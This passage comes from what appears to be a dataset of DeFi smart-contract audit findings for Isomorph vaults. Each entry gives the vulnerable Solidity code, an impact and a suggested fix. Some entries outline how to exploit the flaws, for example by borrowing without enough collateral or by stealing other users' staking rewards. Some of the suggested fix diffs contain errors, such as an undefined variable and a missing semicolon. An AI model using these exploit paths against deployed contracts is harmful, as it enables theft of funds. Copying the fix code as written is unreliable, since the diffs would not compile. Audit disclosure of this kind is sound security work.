lpParams.withdrawalFee);\\n } else {\\n tokenPriceWithFee = tokenPrice;//@audit withdrawalFee is not applied if there are no live borads\\n }\\n\\n return (burnableLiquidity.divideDecimal(tokenPriceWithFee), tokenPriceWithFee, stale);\\n }\\n```\\n\\nFrom the code, it is clear that the withdrawal fee is subtracted only when the related option market has live boards. 
Because `Vault_Lyra.sol` applies a withdrawal fee all the time to price the collateral, it means the user's collateral is under-valued.чMake sure to apply withdrawal fee consistent to how Lyra pool does.чUser's collaterals are under-valued than reasonable and might get to a liquidatable status sooner than expected. A liquidator can abuse this to get an unfair profit by liquidating the user's collateral with the under-estimated value and withdrawing it from the Lyra pool without paying a withdrawal fee.ч```\\nfunction priceCollateralToUSD(bytes32 _currencyKey, uint256 _amount) public view override returns(uint256){\\n //The LiquidityPool associated with the LP Token is used for pricing\\n ILiquidityPoolAvalon LiquidityPool = ILiquidityPoolAvalon(collateralBook.liquidityPoolOf(_currencyKey));\\n //we have already checked for stale greeks so here we call the basic price function.\\n uint256 tokenPrice = LiquidityPool.getTokenPrice();\\n uint256 withdrawalFee = _getWithdrawalFee(LiquidityPool);\\n uint256 USDValue = (_amount * tokenPrice) / LOAN_SCALE;\\n //we remove the Liquidity Pool withdrawalFee\\n //as there's no way to remove the LP position without paying this.\\n uint256 USDValueAfterFee = USDValue * (LOAN_SCALE- withdrawalFee)/LOAN_SCALE;\\n return(USDValueAfterFee);\\n}\\n```\\n -Bad debt may persist even after complete liquidation in Velo Vault due to truncationчmediumчWhen liquidating a user, if all their collateral is taken but it is not valuable enough to repay the entire loan they would be left with remaining debt. This is what is known as bad debt because there is no collateral left to take and the user has no obligation to pay it back. When this occurs, the vault will forgive the user's debts, clearing the bad debt. 
The problem is that the valuations are calculated in two different ways which can lead to truncation issue that completely liquidates a user but doesn't clear their bad debt.\\n```\\n uint256 totalUserCollateral = totalCollateralValue(_collateralAddress, _loanHolder);\\n uint256 proposedLiquidationAmount;\\n { //scope block for liquidationAmount due to stack too deep\\n uint256 liquidationAmount = viewLiquidatableAmount(totalUserCollateral, 1 ether, isoUSDBorrowed, liquidatableMargin);\\n require(liquidationAmount > 0 , \"Loan not liquidatable\");\\n proposedLiquidationAmount = _calculateProposedReturnedCapital(_collateralAddress, _loanNFTs, _partialPercentage);\\n require(proposedLiquidationAmount <= liquidationAmount, \"excessive liquidation suggested\");\\n }\\n uint256 isoUSDreturning = proposedLiquidationAmount*LIQUIDATION_RETURN/LOAN_SCALE;\\n if(proposedLiquidationAmount >= totalUserCollateral){\\n //@audit bad debt cleared here\\n }\\n```\\n\\nThe primary check before clearing bad debt is to check if `proposedLiquidationAmount >= totalUserCollateral`. The purpose of this check is to confirm that all of the user's collateral is being liquidated. The issue is that each value is calculated differently.\\n```\\nfunction totalCollateralValue(address _collateralAddress, address _owner) public view returns(uint256){\\n NFTids memory userNFTs = loanNFTids[_collateralAddress][_owner];\\n IDepositReceipt depositReceipt = IDepositReceipt(_collateralAddress);\\n //slither-disable-next-line uninitialized-local-variables\\n uint256 totalPooledTokens;\\n for(uint256 i =0; i < NFT_LIMIT; i++){\\n //check if each slot contains an NFT\\n if (userNFTs.ids[i] != 0){\\n totalPooledTokens += depositReceipt.pooledTokens(userNFTs.ids[i]);\\n }\\n }\\n return(depositReceipt.priceLiquidity(totalPooledTokens));\\n}\\n```\\n\\n`totalCollateralValue` it used to calculate `totalUserCollateral`. In this method the pooled tokens are summed across all NFT's then they are priced. 
This means that the value of the liquidity is truncated exactly once.\\n```\\nfunction _calculateProposedReturnedCapital(\\n address _collateralAddress, \\n CollateralNFTs calldata _loanNFTs, \\n uint256 _partialPercentage\\n ) internal view returns(uint256){\\n //slither-disable-next-line uninitialized-local-variables\\n uint256 proposedLiquidationAmount;\\n require(_partialPercentage <= LOAN_SCALE, \"partialPercentage greater than 100%\");\\n for(uint256 i = 0; i < NFT_LIMIT; i++){\\n if(_loanNFTs.slots[i] < NFT_LIMIT){\\n if((i == NFT_LIMIT -1) && (_partialPercentage > 0) && (_partialPercentage < LOAN_SCALE) ){\\n //final slot is NFT that will be split if necessary\\n proposedLiquidationAmount += \\n (( _priceCollateral(IDepositReceipt(_collateralAddress), _loanNFTs.ids[i]) \\n *_partialPercentage)/ LOAN_SCALE);\\n } \\n else {\\n proposedLiquidationAmount += _priceCollateral(IDepositReceipt(_collateralAddress), _loanNFTs.ids[i]);\\n }\\n }\\n }\\n return proposedLiquidationAmount;\\n}\\n```\\n\\n`_calculateProposedReturnedCapital` is used to calculate `proposedLiquidationAmount`. The key difference is that each NFT is priced individually. The result is that the value is truncated up to NFT_LIMIT times. This can lead to `proposedLiquidationAmount` being less than totalUserCollateral even if all user collateral is being liquidated.\\nExample: User A has 2 NFTs. They are valued as follows assuming no truncation: 10.6 and 10.7. When calculating via `totalCollateralValue` they will be summed before they are truncated while in `_calculateProposedReturnedCapital` they will be truncated before they are summed.\\ntotalCollateralValue: 10.6 + 10.7 = 21.3 => 21 (truncated)\\n_calculateProposedReturnedCapital: 10.6 => 10 (truncated) 10.7 => 10 (truncated)\\n10 + 10 = 20\\nAs shown above when using the exact same inputs into our two different functions the final answer is different. 
In a scenario like this, even though all collateral is taken from the user, their bad debt won't be cleared.ч`_calculateProposedReturnedCapital` should be changed to be similar to `totalCollateralValue`, summing all pooled tokens before pricing:\\n```\\n function _calculateProposedReturnedCapital(\\n address _collateralAddress, \\n CollateralNFTs calldata _loanNFTs, \\n uint256 _partialPercentage\\n ) internal view returns(uint256) {\\n+ IDepositReceipt depositReceipt = IDepositReceipt(_collateralAddress);\\n //slither-disable-next-line uninitialized-local-variables\\n+ uint256 totalPooledTokens\\n- uint256 proposedLiquidationAmount;\\n require(_partialPercentage <= LOAN_SCALE, \"partialPercentage greater than 100%\");\\n for(uint256 i = 0; i < NFT_LIMIT; i++){\\n if(_loanNFTs.slots[i] < NFT_LIMIT){\\n if((i == NFT_LIMIT -1) && (_partialPercentage > 0) && (_partialPercentage < LOAN_SCALE) ){\\n //final slot is NFT that will be split if necessary\\n+ totalPooledTokens += ((depositReceipt.pooledTokens(userNFTs.ids[i]) * _partialPercentage) / LOAN_SCALE);\\n- proposedLiquidationAmount += \\n- (( _priceCollateral(IDepositReceipt(_collateralAddress), _loanNFTs.ids[i]) \\n- *_partialPercentage)/ LOAN_SCALE);\\n } \\n else{\\n+ totalPooledTokens += depositReceipt.pooledTokens(userNFTs.ids[i]);\\n- proposedLiquidationAmount += _priceCollateral(IDepositReceipt(_collateralAddress), _loanNFTs.ids[i]);\\n }\\n }\\n }\\n+ return(depositReceipt.priceLiquidity(totalPooledTokens));\\n- return proposedLiquidationAmount;\\n }\\n```\\nчBad debt will not be cleared in some liquidation scenariosч```\\n uint256 totalUserCollateral = totalCollateralValue(_collateralAddress, _loanHolder);\\n uint256 proposedLiquidationAmount;\\n { //scope block for liquidationAmount due to stack too deep\\n uint256 liquidationAmount = viewLiquidatableAmount(totalUserCollateral, 1 ether, isoUSDBorrowed, liquidatableMargin);\\n require(liquidationAmount > 0 , \"Loan not liquidatable\");\\n 
proposedLiquidationAmount = _calculateProposedReturnedCapital(_collateralAddress, _loanNFTs, _partialPercentage);\\n require(proposedLiquidationAmount <= liquidationAmount, \"excessive liquidation suggested\");\\n }\\n uint256 isoUSDreturning = proposedLiquidationAmount*LIQUIDATION_RETURN/LOAN_SCALE;\\n if(proposedLiquidationAmount >= totalUserCollateral){\\n //@audit bad debt cleared here\\n }\\n```\\n -priceLiquidity() may not work if PriceFeed.aggregator() is updatedчmediumчpriceLiquidity() may not work if PriceFeed.aggregator() is updated\\nIn the constructor of the DepositReceipt_* contract, the value of minAnswer/maxAnswer in priceFeed.aggregator() is obtained and assigned to *MinPrice/*MaxPrice as the maximum/minimum price limit when calling the getOraclePrice function in priceLiquidity, and *MinPrice/*MaxPrice can not change.\\n```\\n IAccessControlledOffchainAggregator aggregator = IAccessControlledOffchainAggregator(priceFeed.aggregator());\\n //fetch the pricefeeds hard limits so we can be aware if these have been reached.\\n tokenMinPrice = aggregator.minAnswer();\\n tokenMaxPrice = aggregator.maxAnswer();\\n// rest of code\\n uint256 oraclePrice = getOraclePrice(priceFeed, tokenMaxPrice, tokenMinPrice);\\n// rest of code\\n function getOraclePrice(IAggregatorV3 _priceFeed, int192 _maxPrice, int192 _minPrice) public view returns (uint256 ) {\\n (\\n /*uint80 roundID*/,\\n int signedPrice,\\n /*uint startedAt*/,\\n uint timeStamp,\\n /*uint80 answeredInRound*/\\n ) = _priceFeed.latestRoundData();\\n //check for Chainlink oracle deviancies, force a revert if any are present. 
Helps prevent a LUNA like issue\\n require(signedPrice > 0, \"Negative Oracle Price\");\\n require(timeStamp >= block.timestamp - HEARTBEAT_TIME , \"Stale pricefeed\");\\n require(signedPrice < _maxPrice, \"Upper price bound breached\");\\n require(signedPrice > _minPrice, \"Lower price bound breached\");\\n```\\n\\nBut in the priceFeed contract, the address of the aggregator can be changed by the owner, which may cause the value of minAnswer/maxAnswer to change, and the price limit in the DepositReceipt_* contract to be invalid, and priceLiquidity() can not work.\\n```\\n function confirmAggregator(address _aggregator)\\n external\\n onlyOwner()\\n {\\n require(_aggregator == address(proposedAggregator), \"Invalid proposed aggregator\");\\n delete proposedAggregator;\\n setAggregator(_aggregator);\\n }\\n\\n\\n /*\\n * Internal\\n */\\n\\n function setAggregator(address _aggregator)\\n internal\\n {\\n uint16 id = currentPhase.id + 1;\\n currentPhase = Phase(id, AggregatorV2V3Interface(_aggregator));\\n phaseAggregators[id] = AggregatorV2V3Interface(_aggregator);\\n }\\n // rest of code\\n function aggregator()\\n external\\n view\\n returns (address)\\n {\\n return address(currentPhase.aggregator);\\n }\\n```\\nчConsider getting latest priceFeed.aggregator().minAnswer()/maxAnswer() in priceLiquidity()чч```\\n IAccessControlledOffchainAggregator aggregator = IAccessControlledOffchainAggregator(priceFeed.aggregator());\\n //fetch the pricefeeds hard limits so we can be aware if these have been reached.\\n tokenMinPrice = aggregator.minAnswer();\\n tokenMaxPrice = aggregator.maxAnswer();\\n// rest of code\\n uint256 oraclePrice = getOraclePrice(priceFeed, tokenMaxPrice, tokenMinPrice);\\n// rest of code\\n function getOraclePrice(IAggregatorV3 _priceFeed, int192 _maxPrice, int192 _minPrice) public view returns (uint256 ) {\\n (\\n /*uint80 roundID*/,\\n int signedPrice,\\n /*uint startedAt*/,\\n uint timeStamp,\\n /*uint80 answeredInRound*/\\n ) = 
_priceFeed.latestRoundData();\\n //check for Chainlink oracle deviancies, force a revert if any are present. Helps prevent a LUNA like issue\\n require(signedPrice > 0, \"Negative Oracle Price\");\\n require(timeStamp >= block.timestamp - HEARTBEAT_TIME , \"Stale pricefeed\");\\n require(signedPrice < _maxPrice, \"Upper price bound breached\");\\n require(signedPrice > _minPrice, \"Lower price bound breached\");\\n```\\n -Vault_Synths.sol code does not consider protocol exchange fee when evaluating the Collateral worthчmediumчVault_Synths.sol code does not consider protocol fee.\\nIf we look into the good-written documentation:\\nI want to quote:\\nBecause the withdrawalFee of a lyra LP pool can vary we must fetch it each time it is needed to ensure we use an accurate value. LP tokens are devalued by this as a safety measure as any liquidation would include selling the collateral and so should factor in that cost to ensure it is profitable.\\nIn Vault_Lyra.sol, when calculating the collateral of the LP token, the fee is taken into consideration.\\n```\\nfunction priceCollateralToUSD(bytes32 _currencyKey, uint256 _amount) public view override returns(uint256){\\n //The LiquidityPool associated with the LP Token is used for pricing\\n ILiquidityPoolAvalon LiquidityPool = ILiquidityPoolAvalon(collateralBook.liquidityPoolOf(_currencyKey));\\n //we have already checked for stale greeks so here we call the basic price function.\\n uint256 tokenPrice = LiquidityPool.getTokenPrice(); \\n uint256 withdrawalFee = _getWithdrawalFee(LiquidityPool);\\n uint256 USDValue = (_amount * tokenPrice) / LOAN_SCALE;\\n //we remove the Liquidity Pool withdrawalFee \\n //as there's no way to remove the LP position without paying this.\\n uint256 USDValueAfterFee = USDValue * (LOAN_SCALE- withdrawalFee)/LOAN_SCALE;\\n return(USDValueAfterFee);\\n}\\n```\\n\\nThis is not the case for Vault_Synths.sol, the underlying token also charge exchange fee, but this fee is not reflected when 
evaluating the Collateral worth.\\nExchange fees are generated whenever a user exchanges one synthetic asset (Synth) for another through Synthetix.Exchange. Fees are typically between 10-100 bps (0.1%-1%), though usually 30 bps, and when generated are sent to the fee pool, where it is available to be claimed proportionally by SNX stakers each week.\\nwe can see that the sETH token charges 0.25%, the sBTC token charges 0.25%, the sUSD charges 0% fee, but this does not ensure this fee rate will not change in the future.чWe recommend the project consider protocol exchange fee when evaluating the Collateral worth in Vault_Synths.sol\\nPrecisely when the exchange fee is updated, the fee is reflected in the collateral worth.\\n```\\n function setExchangeFeeRateForSynths(bytes32[] calldata synthKeys, uint256[] calldata exchangeFeeRates)\\n external\\n onlyOwner\\n {\\n flexibleStorage().setExchangeFeeRateForSynths(SETTING_EXCHANGE_FEE_RATE, synthKeys, exchangeFeeRates);\\n for (uint i = 0; i < synthKeys.length; i++) {\\n emit ExchangeFeeUpdated(synthKeys[i], exchangeFeeRates[i]);\\n }\\n }\\n\\n /// @notice Set exchange dynamic fee threshold constant in decimal ratio\\n /// @param threshold The exchange dynamic fee threshold\\n /// @return uint threshold constant\\n function setExchangeDynamicFeeThreshold(uint threshold) external onlyOwner {\\n require(threshold != 0, \"Threshold cannot be 0\");\\n\\n flexibleStorage().setUIntValue(SETTING_CONTRACT_NAME, SETTING_EXCHANGE_DYNAMIC_FEE_THRESHOLD, threshold);\\n\\n emit ExchangeDynamicFeeThresholdUpdated(threshold);\\n }\\n```\\nчThe collateral may be overvalued because the exchange does not count when evaluating the Collateral worth and result in bad debt which makes the project insolvent.ч```\\nfunction priceCollateralToUSD(bytes32 _currencyKey, uint256 _amount) public view override returns(uint256){\\n //The LiquidityPool associated with the LP Token is used for pricing\\n ILiquidityPoolAvalon LiquidityPool = 
ILiquidityPoolAvalon(collateralBook.liquidityPoolOf(_currencyKey));\\n //we have already checked for stale greeks so here we call the basic price function.\\n uint256 tokenPrice = LiquidityPool.getTokenPrice(); \\n uint256 withdrawalFee = _getWithdrawalFee(LiquidityPool);\\n uint256 USDValue = (_amount * tokenPrice) / LOAN_SCALE;\\n //we remove the Liquidity Pool withdrawalFee \\n //as there's no way to remove the LP position without paying this.\\n uint256 USDValueAfterFee = USDValue * (LOAN_SCALE- withdrawalFee)/LOAN_SCALE;\\n return(USDValueAfterFee);\\n}\\n```\\n -User is unable to partially payback loan if they aren't able to post enough isoUSD to bring them back to minOpeningMarginчhighчThe only way for a user to reduce their debt is to call closeLoan. If the amount repaid does not bring the user back above minOpeningMargin then the transaction will revert. This is problematic for users that wish to repay their debt but don't have enough to get back to minOpeningMargin as it could lead to unfair liquidations.\\n```\\n if(outstandingisoUSD >= TENTH_OF_CENT){ //ignore leftover debts less than $0.001\\n uint256 collateralLeft = collateralPosted[_collateralAddress][msg.sender] - _collateralToUser;\\n uint256 colInUSD = priceCollateralToUSD(currencyKey, collateralLeft); \\n uint256 borrowMargin = (outstandingisoUSD * minOpeningMargin) / LOAN_SCALE;\\n require(colInUSD > borrowMargin , \"Remaining debt fails to meet minimum margin!\");\\n }\\n```\\n\\nThe checks above are done when a user calls closeLoan. This ensures that the user's margin is back above minOpeningMargin before allowing them to remove any collateral. This is done as a safeguard to block loans users from effectively opening loans at lower than desired margin. This has the unintended consequence that as user cannot pay off any of their loan if they do not increase their loan back above minOpeningMargin. 
This could prevent users from being able to save a loan that is close to liquidation causing them to get liquidated when they otherwise would have paid off their loan.чI recommend adding a separate function that allows users to pay off their loan without removing any collateral:\\n```\\nfunction paybackLoan(\\n address _collateralAddress,\\n uint256 _USDToVault\\n ) external override whenNotPaused \\n {\\n _collateralExists(_collateralAddress);\\n _closeLoanChecks(_collateralAddress, 0, _USDToVault);\\n //make sure virtual price is related to current time before fetching collateral details\\n //slither-disable-next-line reentrancy-vulnerabilities-1\\n _updateVirtualPrice(block.timestamp, _collateralAddress);\\n ( \\n bytes32 currencyKey,\\n uint256 minOpeningMargin,\\n ,\\n ,\\n ,\\n uint256 virtualPrice,\\n \\n ) = _getCollateral(_collateralAddress);\\n //check for frozen or paused collateral\\n _checkIfCollateralIsActive(currencyKey);\\n\\n uint256 isoUSDdebt = (isoUSDLoanAndInterest[_collateralAddress][msg.sender] * virtualPrice) / LOAN_SCALE;\\n require( isoUSDdebt >= _USDToVault, \"Trying to return more isoUSD than borrowed!\");\\n uint256 outstandingisoUSD = isoUSDdebt - _USDToVault;\\n\\n uint256 collateral = collateralPosted[_collateralAddress][msg.sender];\\n uint256 colInUSD = priceCollateralToUSD(currencyKey, collateral); \\n uint256 borrowMargin = (outstandingisoUSD * liquidatableMargin) / LOAN_SCALE;\\n require(colInUSD > borrowMargin , \"Liquidation margin not met!\");\\n \\n //record paying off loan principle before interest\\n //slither-disable-next-line uninitialized-local-variables\\n uint256 interestPaid;\\n uint256 loanPrinciple = isoUSDLoaned[_collateralAddress][msg.sender];\\n if( loanPrinciple >= _USDToVault){\\n //pay off loan principle first\\n isoUSDLoaned[_collateralAddress][msg.sender] = loanPrinciple - _USDToVault;\\n }\\n else{\\n interestPaid = _USDToVault - loanPrinciple;\\n //loan principle is fully repaid so record this.\\n 
isoUSDLoaned[_collateralAddress][msg.sender] = 0;\\n }\\n //update mappings with reduced amounts\\n isoUSDLoanAndInterest[_collateralAddress][msg.sender] = isoUSDLoanAndInterest[_collateralAddress][msg.sender] - ((_USDToVault * LOAN_SCALE) / virtualPrice);\\n emit ClosedLoan(msg.sender, _USDToVault, currencyKey, 0);\\n //Now all effects are handled, transfer the assets so we follow CEI pattern\\n _decreaseLoan(_collateralAddress, 0, _USDToVault, interestPaid);\\n}\\n```\\nчUser is unable to make partial repayments if their payment does not increase margin enoughч```\\n if(outstandingisoUSD >= TENTH_OF_CENT){ //ignore leftover debts less than $0.001\\n uint256 collateralLeft = collateralPosted[_collateralAddress][msg.sender] - _collateralToUser;\\n uint256 colInUSD = priceCollateralToUSD(currencyKey, collateralLeft); \\n uint256 borrowMargin = (outstandingisoUSD * minOpeningMargin) / LOAN_SCALE;\\n require(colInUSD > borrowMargin , \"Remaining debt fails to meet minimum margin!\");\\n }\\n```\\n -The calculation of ````totalUSDborrowed```` in ````openLoan()```` is not correctчhighчThe `openLoan()` function wrongly use `isoUSDLoaned` to calculate `totalUSDborrowed`. 
Attacker can exploit it to bypass security check and loan isoUSD with no enough collateral.\\nvulnerability point\\n```\\nfunction openLoan(\\n // // rest of code\\n ) external override whenNotPaused \\n {\\n //// rest of code\\n uint256 colInUSD = priceCollateralToUSD(currencyKey, _colAmount\\n + collateralPosted[_collateralAddress][msg.sender]);\\n uint256 totalUSDborrowed = _USDborrowed \\n + (isoUSDLoaned[_collateralAddress][msg.sender] * virtualPrice)/LOAN_SCALE;\\n // @audit should be isoUSDLoanAndInterest[_collateralAddress][msg.sender]\\n require(totalUSDborrowed >= ONE_HUNDRED_DOLLARS, \"Loan Requested too small\");\\n uint256 borrowMargin = (totalUSDborrowed * minOpeningMargin) / LOAN_SCALE;\\n require(colInUSD >= borrowMargin, \"Minimum margin not met!\");\\n\\n // // rest of code\\n}\\n```\\n\\nAttack example: <1>Attacker normally loans and produces 10000 isoUSD interest <2>Attacker repays principle but left interest <3>Attacker open a new 10000 isoUSD loan without providing collateralчSee Vulnerability DetailчAttacker can loan isoUSD with no enough collateral.ч```\\nfunction openLoan(\\n // // rest of code\\n ) external override whenNotPaused \\n {\\n //// rest of code\\n uint256 colInUSD = priceCollateralToUSD(currencyKey, _colAmount\\n + collateralPosted[_collateralAddress][msg.sender]);\\n uint256 totalUSDborrowed = _USDborrowed \\n + (isoUSDLoaned[_collateralAddress][msg.sender] * virtualPrice)/LOAN_SCALE;\\n // @audit should be isoUSDLoanAndInterest[_collateralAddress][msg.sender]\\n require(totalUSDborrowed >= ONE_HUNDRED_DOLLARS, \"Loan Requested too small\");\\n uint256 borrowMargin = (totalUSDborrowed * minOpeningMargin) / LOAN_SCALE;\\n require(colInUSD >= borrowMargin, \"Minimum margin not met!\");\\n\\n // // rest of code\\n}\\n```\\n -User can steal rewards from other users by withdrawing their Velo Deposit NFTs from other users' depositorsчhighчRewards from staking AMM tokens accumulate to the depositor used to deposit them. 
The rewards accumulated by a depositor are passed to the owner when they claim. A malicious user to steal the rewards from other users by manipulating other users depositors. Since any NFT of a DepositReceipt can be withdrawn from any depositor with the same DepositReceipt, a malicious user could mint an NFT on their depositor then withdraw in from another user's depositor. The net effect is that that the victims deposits will effectively be in the attackers depositor and they will collect all the rewards.\\n```\\nfunction withdrawFromGauge(uint256 _NFTId, address[] memory _tokens) public {\\n uint256 amount = depositReceipt.pooledTokens(_NFTId);\\n depositReceipt.burn(_NFTId);\\n gauge.getReward(address(this), _tokens);\\n gauge.withdraw(amount);\\n //AMMToken adheres to ERC20 spec meaning it reverts on failure, no need to check return\\n //slither-disable-next-line unchecked-transfer\\n AMMToken.transfer(msg.sender, amount);\\n}\\n```\\n\\nEvery user must create a `Depositor` using `Templater` to interact with vaults and take loans. `Depositor#withdrawFromGauge` allows any user to withdraw any NFT that was minted by the same `DepositReciept`. This is where the issues arises. Since rewards are accumulated to the `Depositor` in which the underlying is staked a user can deposit to their `Depositor` then withdraw their NFT through the `Depositor` of another user's `Depositor` that uses the same `DepositReciept`. The effect is that the tokens will remained staked to the attackers `Depositor` allowing them to steal all the other user's rewards.\\nExample: `User A` and `User B` both create a `Depositor` for the same `DepositReciept`. Both users deposit 100 tokens into their respective `Depositors`. `User B` now calls `withdrawFromGauge` on `Depositor` A. `User B` gets their 100 tokens back and `Depositor B` still has 100 tokens deposited in it. 
`User B` cannot steal these tokens but they are now collecting the yield on all 100 tokens via `Depositor B` and `User A` isn't getting any rewards at all because `Depositor` A no longer has any tokens deposited into Velodrome gauge.чDepositors should only be able to burn NFTs that they minted. Change DepositReciept_Base#burn to enforce this:\\n```\\n function burn(uint256 _NFTId) external onlyMinter{\\n+ //tokens must be burned by the depositor that minted them\\n+ address depositor = relatedDepositor[_NFTId];\\n+ require(depositor == msg.sender, \"Wrong depositor\");\\n require(_isApprovedOrOwner(msg.sender, _NFTId), \"ERC721: caller is not token owner or approved\");\\n delete pooledTokens[_NFTId];\\n delete relatedDepositor[_NFTId];\\n _burn(_NFTId);\\n }\\n```\\nчMalicious user can steal other user's rewardsч```\\nfunction withdrawFromGauge(uint256 _NFTId, address[] memory _tokens) public {\\n uint256 amount = depositReceipt.pooledTokens(_NFTId);\\n depositReceipt.burn(_NFTId);\\n gauge.getReward(address(this), _tokens);\\n gauge.withdraw(amount);\\n //AMMToken adheres to ERC20 spec meaning it reverts on failure, no need to check return\\n //slither-disable-next-line unchecked-transfer\\n AMMToken.transfer(msg.sender, amount);\\n}\\n```\\n -Vault_Base_ERC20#_updateVirtualPrice calculates interest incorrectly if updated frequentlyчmediumчUpdating the virtual price of an asset happens in discrete increments of 3 minutes. This is done to reduce the chance of DOS loops. The issue is that it updates the time to an incorrect timestamp. It should update to the truncated 3 minute interval but instead updates to the current timestamp. 
The result is that the interest calculation can be abused to lower effective interest rate.\\n```\\nfunction _updateVirtualPrice(uint256 _currentBlockTime, address _collateralAddress) internal { \\n ( ,\\n ,\\n ,\\n uint256 interestPer3Min,\\n uint256 lastUpdateTime,\\n uint256 virtualPrice,\\n\\n ) = _getCollateral(_collateralAddress);\\n uint256 timeDelta = _currentBlockTime - lastUpdateTime;\\n //exit gracefully if two users call the function for the same collateral in the same 3min period\\n //@audit increments \\n uint256 threeMinuteDelta = timeDelta / 180; \\n if(threeMinuteDelta > 0) {\\n for (uint256 i = 0; i < threeMinuteDelta; i++ ){\\n virtualPrice = (virtualPrice * interestPer3Min) / LOAN_SCALE; \\n }\\n collateralBook.vaultUpdateVirtualPriceAndTime(_collateralAddress, virtualPrice, _currentBlockTime);\\n }\\n}\\n```\\n\\n_updateVirtualPrice is used to update the interest calculations for the specified collateral and is always called with block.timestamp. Due to truncation threeMinuteDelta is always rounded down, that is if there has been 1.99 3-minute intervals it will truncate to 1. The issue is that in the collateralBook#vaultUpdateVirtualPriceAndTime subcall the time is updated to block.timestamp (_currentBlockTime).\\nExample: lastUpdateTime = 1000 and block.timestamp (_currentBlockTime) = 1359.\\ntimeDelta = 1359 - 1000 = 359\\nthreeMinuteDelta = 359 / 180 = 1\\nThis updates the interest by only as single increment but pushes the new time forward 359 seconds. When called again it will use 1359 as lastUpdateTime which means that 179 seconds worth of interest have been permanently lost. Users with large loan positions could abuse this to effectively halve their interest accumulation. 
Given how cheap optimism transactions are it is highly likely this could be exploited profitably with a bot.чBefore updating the interest time it should first truncate it to the closest 3-minute interval:\\n```\\n if(threeMinuteDelta > 0) {\\n for (uint256 i = 0; i < threeMinuteDelta; i++ ){\\n virtualPrice = (virtualPrice * interestPer3Min) / LOAN_SCALE; \\n }\\n+ _currentBlockTime = (_currentBlockTime / 180) * 180;\\n collateralBook.vaultUpdateVirtualPriceAndTime(_collateralAddress, virtualPrice, _currentBlockTime);\\n }\\n```\\nчInterest calculations will be incorrect if they are updated frequently, which can be abused by users with large amounts of debt to halve their accumulated interestч```\\nfunction _updateVirtualPrice(uint256 _currentBlockTime, address _collateralAddress) internal { \\n ( ,\\n ,\\n ,\\n uint256 interestPer3Min,\\n uint256 lastUpdateTime,\\n uint256 virtualPrice,\\n\\n ) = _getCollateral(_collateralAddress);\\n uint256 timeDelta = _currentBlockTime - lastUpdateTime;\\n //exit gracefully if two users call the function for the same collateral in the same 3min period\\n //@audit increments \\n uint256 threeMinuteDelta = timeDelta / 180; \\n if(threeMinuteDelta > 0) {\\n for (uint256 i = 0; i < threeMinuteDelta; i++ ){\\n virtualPrice = (virtualPrice * interestPer3Min) / LOAN_SCALE; \\n }\\n collateralBook.vaultUpdateVirtualPriceAndTime(_collateralAddress, virtualPrice, _currentBlockTime);\\n }\\n}\\n```\\n -All collateral in Velodrome vault will be permantly locked if either asset in liquidity pair stays outside of min/max priceчmediumчThe oracles used have a built in safeguard to revert the transaction if the queried asset is outside of a defined price range. The issue with this is that every vault interaction requires the underlying collateral to be valued. 
If one of the assets in the pair goes outside it's immutable range then the entire vault will be frozen and all collateral will be permanently stuck.\\n```\\nfunction getOraclePrice(IAggregatorV3 _priceFeed, int192 _maxPrice, int192 _minPrice) public view returns (uint256 ) {\\n (\\n /*uint80 roundID*/,\\n int signedPrice,\\n /*uint startedAt*/,\\n uint timeStamp,\\n /*uint80 answeredInRound*/\\n ) = _priceFeed.latestRoundData();\\n //check for Chainlink oracle deviancies, force a revert if any are present. Helps prevent a LUNA like issue\\n require(signedPrice > 0, \"Negative Oracle Price\");\\n require(timeStamp >= block.timestamp - HEARTBEAT_TIME , \"Stale pricefeed\");\\n\\n //@audit revert if price is outside of immutable bounds\\n require(signedPrice < _maxPrice, \"Upper price bound breached\");\\n require(signedPrice > _minPrice, \"Lower price bound breached\");\\n uint256 price = uint256(signedPrice);\\n return price;\\n}\\n```\\n\\nThe lines above are called each time and asset is priced. If the oracle returns outside of the predefined range then the transaction will revert.\\n```\\n uint256 outstandingisoUSD = isoUSDdebt - _USDToVault;\\n //@audit contract prices withdraw collateral\\n uint256 colInUSD = _calculateProposedReturnedCapital(_collateralAddress, _loanNFTs, _partialPercentage);\\n if(outstandingisoUSD >= TENTH_OF_CENT){ //ignore debts less than $0.001\\n uint256 collateralLeft = totalCollateralValue(_collateralAddress, msg.sender) - colInUSD;\\n uint256 borrowMargin = (outstandingisoUSD * minOpeningMargin) / LOAN_SCALE;\\n require(collateralLeft > borrowMargin , \"Remaining debt fails to meet minimum margin!\");\\n }\\n```\\n\\nWhen closing a loan the vault attempts to price the users collateral. 
Since this is the only way for a user to remove collateral is to call closeLoan, if the price of either asset in the LP goes outside of its bounds then all user deposits will be lost.чIf a user is closing their entire loan then there is no need to check the value of the withdraw collateral because there is no longer any debt to collateralize. Move the check inside the inequality to allow the closeLoan to always function:\\n```\\n uint256 outstandingisoUSD = isoUSDdebt - _USDToVault;\\n- uint256 colInUSD = _calculateProposedReturnedCapital(_collateralAddress, _loanNFTs, _partialPercentage);\\n+ uint256 colInUSD;\\n if(outstandingisoUSD >= TENTH_OF_CENT){ //ignore debts less than $0.001\\n+ uint256 colInUSD = _calculateProposedReturnedCapital(_collateralAddress, _loanNFTs, _partialPercentage);\\n uint256 collateralLeft = totalCollateralValue(_collateralAddress, msg.sender) - colInUSD;\\n uint256 borrowMargin = (outstandingisoUSD * minOpeningMargin) / LOAN_SCALE;\\n require(collateralLeft > borrowMargin , \"Remaining debt fails to meet minimum margin!\");\\n }\\n```\\nчEntire vault will be frozen and all collateral will be permanently stuckч```\\nfunction getOraclePrice(IAggregatorV3 _priceFeed, int192 _maxPrice, int192 _minPrice) public view returns (uint256 ) {\\n (\\n /*uint80 roundID*/,\\n int signedPrice,\\n /*uint startedAt*/,\\n uint timeStamp,\\n /*uint80 answeredInRound*/\\n ) = _priceFeed.latestRoundData();\\n //check for Chainlink oracle deviancies, force a revert if any are present. 
